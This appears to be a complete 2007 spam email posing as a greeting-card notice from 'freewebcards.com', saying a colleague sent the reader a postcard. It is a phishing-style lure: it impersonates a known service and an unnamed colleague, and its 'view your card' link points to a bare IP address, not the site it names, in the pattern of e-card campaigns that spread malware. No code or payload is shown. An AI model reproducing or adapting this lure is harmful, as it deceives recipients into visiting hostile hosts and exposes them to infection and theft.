Subject: Colleague sent you a postcard from freewebcards.com!

From: "freewebcards.com" <[email-masked]>
Date: Fri, 10 Aug 2007 10:09:53 +0200

Colleague has created a postcard for you at freewebcards.com,
the Internet's most popular greeting card service. 

Your greeting card ID is: 5ee713076a3db573383e1a7a85955ab65e8517 

To see your custom greeting card, simply click on the link below: 
http://75.34.98.76/?5ee713076a3db573383e1a7a85955ab65e8517

Send greeting cards from freewebcards.com whenever you want by visiting us at: 
http://freewebcards.com/
Copyright (c) 1996-2007 freewebcards.com All Rights Reserved